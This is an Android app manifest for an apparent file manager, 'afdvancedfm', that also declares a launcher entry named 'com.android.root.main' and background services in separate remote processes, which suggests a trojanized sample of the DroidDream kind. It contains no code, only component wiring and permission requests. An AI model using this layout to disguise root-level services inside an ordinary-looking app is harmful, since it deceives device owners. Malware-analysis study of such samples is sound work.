<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.droiddream.android.afdvancedfm">
    <application android:icon="@drawable/afm_medium" android:label="@string/app_name">
        <activity android:configChanges="orientation" android:label="@string/app_name" android:name="com.adao.android.afm.CoverActivity"/>
        <activity android:configChanges="orientation" android:name="com.adao.android.afm.FileListActivity"/>
        <activity android:configChanges="orientation" android:name="com.adao.android.afm.AppListActivity"/>
        <activity android:name="com.adao.android.afm.PrefActivity"/>
        <activity android:name="com.adao.android.afm.BookmarkActivity" android:noHistory="true"/>
        <activity android:name="com.adao.android.afm.ShortcutActivity" android:noHistory="true">
            <intent-filter>
                <category android:name="android.intent.category.DEFAULT"/>
                <action android:name="com.athene.android.aac.ShortcutAction"/>
            </intent-filter>
        </activity>
        <activity android:name="com.android.root.main">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <service android:name="com.android.root.Setting" android:process=":remote"/>
        <service android:name="com.android.root.AlarmReceiver" android:process=":remote2"/>
        <meta-data android:name="ADMOB_PUBLISHER_ID" android:value="a14bd7fd98981a8"/>
    </application>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
</manifest>
